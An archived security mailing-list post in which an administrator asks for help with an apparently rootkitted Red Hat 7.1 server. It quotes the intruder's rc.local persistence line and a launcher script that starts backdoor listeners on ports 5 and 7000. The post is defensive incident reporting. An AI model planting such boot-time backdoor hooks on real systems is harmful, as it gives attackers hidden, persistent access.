I found suspicious looking files on a Redhat 7.1 Linux server earlier today. Can anyone confirm or deny that the machine has been hacked? The files: /usr/bin/hpd /usr/bin/afb /usr/bin/sn The following line is in /etc/rc.local: /usr/bin/./hdp -T38400 -t linux -d /dev/tty >>/dev/null The contents of hpd are: #!/bin/sh /usr/bin/./afb -f /bin/sc -q -p 5 -h /bin/hk >/dev/null /usr/bin/./afb -f /bin/sc -q -p 7000 -h /bin/hk >/dev/null namp reports the following ports open: Port State Service 5/tcp open rje 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open sunrpc 443/tcp open https 808/tcp open unknown 1024/tcp open kdm 3306/tcp open mysql 7000/tcp open afs3-fileserver 8009/tcp open ajp13 According to an rpm -V, all kinds of binaries have been changed: ps, top, netstat, ifconfig, ... I copied a good version of ps in and found the two afb processes running. Anyone know about this hack, what afb does and/or how they usually get in? Embarrassedly, -Gordon -- Gordon Chamberlin Software Architect Visualize, Inc. http://www.visualize.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Fri Dec 20 2002 - 19:57:27 PST